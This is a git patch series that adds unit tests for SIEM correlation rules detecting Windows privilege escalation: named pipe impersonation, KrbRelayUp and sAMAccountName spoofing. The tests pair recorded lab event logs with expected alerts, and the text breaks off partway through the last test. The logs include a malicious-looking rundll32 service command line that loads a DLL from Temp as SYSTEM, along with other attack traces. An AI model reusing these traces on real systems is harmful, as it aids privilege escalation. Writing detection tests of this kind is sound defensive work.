"win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_18_Pipe_connected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "18", "normalized": true, "object": "resource", "object.name": "pdxxuf", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:57:31.328Z", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "subject.process.guid": "b56fc2d9-c391-6464-1412-000000005e00", "subject.process.id": "13856", "subject.process.name": "rundll32.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:07:45.979Z", "type": "raw", "uuid": "18419f52-6dfe-4de4-a9df-60220d170138"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Service Control Manager\",\"Guid\":\"{555908d1-a6d7-4695-8e1e-26931d2012f4}\",\"EventSourceName\":\"Service Control Manager\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"7045\"},\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"0\",\"Opcode\":\"0\",\"Keywords\":\"0x8080000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:07:45.7609721Z\"},\"EventRecordID\":\"117972\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"660\",\"ThreadID\":\"12720\"},\"Channel\":\"System\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-21-1129291328-2819992169-918366777-1113\"}},\"EventData\":{\"Data\":[{\"Name\":\"ServiceName\",\"text\":\"pdxxuf\"},{\"Name\":\"ImagePath\",\"text\":\"rundll32.exe C:\\\\Users\\\\yfomina\\\\AppData\\\\Local\\\\Temp\\\\pdxxuf.dll,a /p:pdxxuf\"},{\"Name\":\"ServiceType\",\"text\":\"user mode service\"},{\"Name\":\"StartType\",\"text\":\"demand start\"},{\"Name\":\"AccountName\",\"text\":\"LocalSystem\"}]}}}", "category.generic": "Service", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_7045_New_Windows_Service", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7045", "normalized": true, "object": "service", "object.account.name": "localsystem", "object.name": "pdxxuf", "object.process.cmdline": "rundll32.exe C:\\Users\\yfomina\\AppData\\Local\\Temp\\pdxxuf.dll,a /p:pdxxuf", "object.property": "start type", "object.type": "user mode service", "object.value": "demand start", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:57:31.328Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:07:45.760Z", "type": "raw", "uuid": "5a23eb15-74f6-48d3-8ae5-70a7ae447c99"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "escalate", "alert.context": "yfomina -> system", "alert.key": "c:\\users\\yfomina\\downloads\\installer.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Token Impersonation/Theft", "correlation_name": "Named_Pipe_Impersonation_PrivEsc", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "object": "session", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.name": "pdxxuf", "object.property": "start type", "object.type": "user mode service", "object.value": "demand start", "reason": "Named Pipe Impersonation (Dropper/Admin)", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc new file mode 100644 index 00000000..8386245f --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc @@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:08:40.8961838Z\"},\"EventRecordID\":\"42239824\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"2460\"},\"Channel\":\"Security\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1129291328-2819992169-918366777-1113\"},{\"Name\":\"SubjectUserName\",\"text\":\"yfomina\"},{\"Name\":\"SubjectDomainName\",\"text\":\"TESTLAB\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x48f85a9\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"::1\"},{\"Name\":\"IpPort\",\"text\":\"55676\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"0029482318be6784\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win10x64-133.testlab.esc", "dst.host": "win10x64-133.testlab.esc", "dst.hostname": "win10x64-133", "event_src.category": "Operating system", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\0029482318be6784", "object.name": "0029482318be6784", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\0029482318be6784", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "0029482318be6784", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T12:03:22.271Z", "src.host": "::1", "src.ip": "::1", "src.port": 55676, "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "subject.account.name": "yfomina", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "76514729", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:08:40.896Z", "type": "raw", "uuid": "2ecd866e-b08f-4694-aa9c-365d043b0538"} +{"action": "bind", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"18\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"18\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:08:40.8964310Z\"},\"EventRecordID\":\"90395393\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4200\",\"ThreadID\":\"13908\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"ConnectPipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 12:08:40.887\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ea50-6454-eb03-000000000000}\"},{\"Name\":\"ProcessId\",\"text\":\"4\"},{\"Name\":\"PipeName\",\"text\":\"\\\\0029482318be6784\"},{\"Name\":\"Image\",\"text\":\"System\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_18_Pipe_connected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "18", "normalized": true, "object": "resource", "object.name": "0029482318be6784", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T12:03:22.271Z", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "system", "subject.process.guid": "b56fc2d9-ea50-6454-eb03-000000000000", "subject.process.id": "4", "subject.process.name": "system", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:08:40.887Z", "type": "raw", "uuid": "bf1cf59f-425f-457c-9457-7a8b36129c91"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"17\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"17\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:08:40.8784795Z\"},\"EventRecordID\":\"90395390\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4200\",\"ThreadID\":\"13908\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"CreatePipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 12:08:40.869\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ab37-6464-5711-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"5852\"},{\"Name\":\"PipeName\",\"text\":\"\\\\0029482318be6784\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\yfomina\\\\Downloads\\\\installer.exe\"},{\"Name\":\"User\",\"text\":\"TESTLAB\\\\yfomina\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_17_Pipe_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "17", "normalized": true, "object": "resource", "object.name": "0029482318be6784", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T12:03:22.271Z", "status": "success", "subject": "process", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:08:40.869Z", "type": "raw", "uuid": "5bbddf39-aba6-4054-9c85-6125dfca64dc"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "escalate", "alert.context": "yfomina -> system", "alert.key": "c:\\users\\yfomina\\downloads\\installer.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Token Impersonation/Theft", "correlation_name": "Named_Pipe_Impersonation_PrivEsc", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "object": "session", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.storage.fullpath": "\\0029482318be6784", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "0029482318be6784", "object.storage.path": "\\", "reason": "Named Pipe Impersonation (RPCSS variant)", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\"} From faf81f889723a124df39c4fe5cd9349183847153 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 10:34:04 +0300 Subject: [PATCH 50/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Potential=5FPrivileged?= =?UTF-8?q?=5FEscalation=5Fvia=5FKrbRelayUp)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Potential_Privileged_Escalation_via_KrbRelayUp/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Potential_Privileged_Escalation_via_KrbRelayUp/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Potential_Privileged_Escalation_via_KrbRelayUp/tests/test_1.sc new file mode 100644 index 00000000..fa28ebdb --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Potential_Privileged_Escalation_via_KrbRelayUp/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2022-04-25T22:17:47.0581723Z\"},\"EventRecordID\":\"72742\",\"Correlation\":{\"ActivityID\":\"{6c67e3ee-58ed-0002-0de4-676ced58d801}\"},\"Execution\":{\"ProcessID\":\"680\",\"ThreadID\":\"768\"},\"Channel\":\"Security\",\"Computer\":\"02694w-win10.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"SubjectUserName\",\"text\":\"-\"},{\"Name\":\"SubjectDomainName\",\"text\":\"-\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x0\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"TargetUserName\",\"text\":\"Administrator\"},{\"Name\":\"TargetDomainName\",\"text\":\"THREEBEESCO.COM\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x8a38de\"},{\"Name\":\"LogonType\",\"text\":\"3\"},{\"Name\":\"LogonProcessName\",\"text\":\"Kerberos\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"Kerberos\"},{\"Name\":\"WorkstationName\",\"text\":\"-\"},{\"Name\":\"LogonGuid\",\"text\":\"{35d5e180-95bd-9ed7-7efe-c355d7215a87}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x0\"},{\"Name\":\"ProcessName\",\"text\":\"-\"},{\"Name\":\"IpAddress\",\"text\":\"127.0.0.1\"},{\"Name\":\"IpPort\",\"text\":\"50163\"},{\"Name\":\"ImpersonationLevel\",\"text\":\"%%1833\"},{\"Name\":\"RestrictedAdminMode\",\"text\":\"-\"},{\"Name\":\"TargetOutboundUserName\",\"text\":\"-\"},{\"Name\":\"TargetOutboundDomainName\",\"text\":\"-\"},{\"Name\":\"VirtualAccount\",\"text\":\"%%1843\"},{\"Name\":\"TargetLinkedLogonId\",\"text\":\"0x0\"},{\"Name\":\"ElevatedToken\",\"text\":\"%%1842\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "chain_id": "6c67e3ee-58ed-0002-0de4-676ced58d801", "datafield6": "Network", "datafield9": "Kerberos", "dst.fqdn": "02694w-win10.threebeesco.com", "dst.host": "02694w-win10.threebeesco.com", "dst.hostname": "02694w-win10", "event_src.category": "AAA", "event_src.fqdn": "02694w-win10.threebeesco.com", "event_src.host": "02694w-win10.threebeesco.com", "event_src.hostname": "02694w-win10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "Kerberos", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:59:37.461Z", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 50163, "status": "success", "subject": "account", "subject.account.domain": "threebeesco.com", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "administrator", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "9058526", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2022-04-25T22:17:47.058Z", "type": "raw", "uuid": "ab2f9c44-31a2-4cef-ac4e-34a421a9c792"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "login", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Valid Accounts", "correlation_name": "Potential_Privileged_Escalation_via_KrbRelayUp", "correlation_type": "incident", "dst.fqdn": "02694w-win10.threebeesco.com", "dst.host": "02694w-win10.threebeesco.com", "dst.hostname": "02694w-win10", "event_src.category": "AAA", "event_src.host": "02694w-win10.threebeesco.com", "event_src.hostname": "02694w-win10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.category": "Undefined", "incident.severity": "high", "logon_auth_method": "remote", "logon_service": "Kerberos", "logon_type": 3, "object": "system", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 50163, "status": "success", "subject": "account", "subject.account.domain": "threebeesco.com", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "administrator", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "9058526"} From e3deb0f18eb9cbea7a0062c671149cc20e8312d8 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 10:38:02 +0300 Subject: [PATCH 51/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB=D1=8F=20?= =?UTF-8?q?=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(sAMAccountName=5F?= =?UTF-8?q?Spoofing)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../sAMAccountName_Spoofing/tests/test_1.sc | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/sAMAccountName_Spoofing/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/sAMAccountName_Spoofing/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/sAMAccountName_Spoofing/tests/test_1.sc new file mode 100644 index 00000000..7a3f1e99 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/sAMAccountName_Spoofing/tests/test_1.sc @@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4742\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13825\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-12-12T17:57:52.4994283Z\"},\"EventRecordID\":\"2982098\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"624\",\"ThreadID\":\"2456\"},\"Channel\":\"Security\",\"Computer\":\"dc012.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"ComputerAccountChange\",\"text\":\"-\"},{\"Name\":\"TargetUserName\",\"text\":\"DC012\"},{\"Name\":\"TargetDomainName\",\"text\":\"3B\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220105\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-101606\"},{\"Name\":\"SubjectUserName\",\"text\":\"lgrove\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x738cf9\"},{\"Name\":\"PrivilegeList\",\"text\":\"-\"},{\"Name\":\"SamAccountName\",\"text\":\"DC012\"},{\"Name\":\"DisplayName\",\"text\":\"-\"},{\"Name\":\"UserPrincipalName\",\"text\":\"-\"},{\"Name\":\"HomeDirectory\",\"text\":\"-\"},{\"Name\":\"HomePath\",\"text\":\"-\"},{\"Name\":\"ScriptPath\",\"text\":\"-\"},{\"Name\":\"ProfilePath\",\"text\":\"-\"},{\"Name\":\"UserWorkstations\",\"text\":\"-\"},{\"Name\":\"PasswordLastSet\",\"text\":\"-\"},{\"Name\":\"AccountExpires\",\"text\":\"-\"},{\"Name\":\"PrimaryGroupId\",\"text\":\"-\"},{\"Name\":\"AllowedToDelegateTo\",\"text\":\"-\"},{\"Name\":\"OldUacValue\",\"text\":\"-\"},{\"Name\":\"NewUacValue\",\"text\":\"-\"},{\"Name\":\"UserAccountControl\",\"text\":\"-\"},{\"Name\":\"UserParameters\",\"text\":\"-\"},{\"Name\":\"SidHistory\",\"text\":\"-\"},{\"Name\":\"LogonHours\",\"text\":\"-\"},{\"Name\":\"DnsHostName\",\"text\":\"-\"},{\"Name\":\"ServicePrincipalNames\",\"text\":\"-\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield2": "-", "event_src.category": "Directory service", "event_src.fqdn": "dc012.threebeesco.com", "event_src.host": "dc012.threebeesco.com", "event_src.hostname": "dc012", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4742_A_computer_account_was_changed", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4742", "normalized": true, "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-220105", "object.account.name": "dc012", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T19:34:20.525Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-101606", "subject.account.name": "lgrove", "subject.account.session_id": "7572729", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-12-12T17:57:52.499Z", "type": "raw", "uuid": "4bcc4136-497e-47e8-a24c-bb0db1a0079d"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4768\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-12-12T17:57:52.5732454Z\"},\"EventRecordID\":\"2982095\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"624\",\"ThreadID\":\"2456\"},\"Channel\":\"Security\",\"Computer\":\"dc012.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"dc012\"},{\"Name\":\"TargetDomainName\",\"text\":\"threebeesco.com\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220105\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt\"},{\"Name\":\"ServiceSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-502\"},{\"Name\":\"TicketOptions\",\"text\":\"0x40800010\"},{\"Name\":\"Status\",\"text\":\"0x0\"},{\"Name\":\"TicketEncryptionType\",\"text\":\"0x17\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"::ffff:172.16.66.19\"},{\"Name\":\"IpPort\",\"text\":\"50615\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "No error", "datafield5": "0x17", "datafield6": "RC4-HMAC", "datafield8": "0x40800010", "datafield9": "S-1-5-21-308926384-506822093-3341789130-502", "event_src.category": "AAA", "event_src.fqdn": "dc012.threebeesco.com", "event_src.host": "dc012.threebeesco.com", "event_src.hostname": "dc012", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": 